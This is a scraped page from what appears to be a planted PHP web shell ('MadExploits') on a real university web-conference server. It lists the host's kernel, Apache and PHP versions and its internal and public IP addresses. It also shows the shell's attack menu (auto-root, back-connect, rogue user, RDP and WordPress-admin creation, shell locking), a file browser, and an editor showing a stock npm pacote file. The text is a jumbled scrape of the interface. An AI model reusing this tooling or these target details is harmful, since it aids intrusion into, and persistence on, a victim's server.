Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.17.156.154
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
npm /
node_modules /
pacote /
lib /
fetchers /
[ HOME SHELL ]
Name
Size
Permission
Action
registry
[ DIR ]
drwxr-xr-x
alias.js
554
B
-rw-r--r--
directory.js
3
KB
-rw-r--r--
file.js
2.4
KB
-rw-r--r--
git.js
5.59
KB
-rw-r--r--
hosted.js
48
B
-rw-r--r--
range.js
53
B
-rw-r--r--
remote.js
856
B
-rw-r--r--
tag.js
53
B
-rw-r--r--
version.js
53
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : remote.js
'use strict' const BB = require('bluebird') const Fetcher = require('../fetch') const fetchRegistry = require('./registry') const fetchRemote = module.exports = Object.create(null) Fetcher.impl(fetchRemote, { packument (spec, opts) { return BB.reject(new Error('Not implemented yet')) }, manifest (spec, opts) { // We can't get the manifest for a remote tarball until // we extract the tarball itself. // `finalize-manifest` takes care of this process of extracting // a manifest based on ./tarball.js return BB.resolve(null) }, tarball (spec, opts) { const uri = spec._resolved || spec.fetchSpec return fetchRegistry.fromManifest({ _resolved: uri, _integrity: opts.integrity }, spec, opts) }, fromManifest (manifest, spec, opts) { return this.tarball(manifest || spec, opts) } })
Close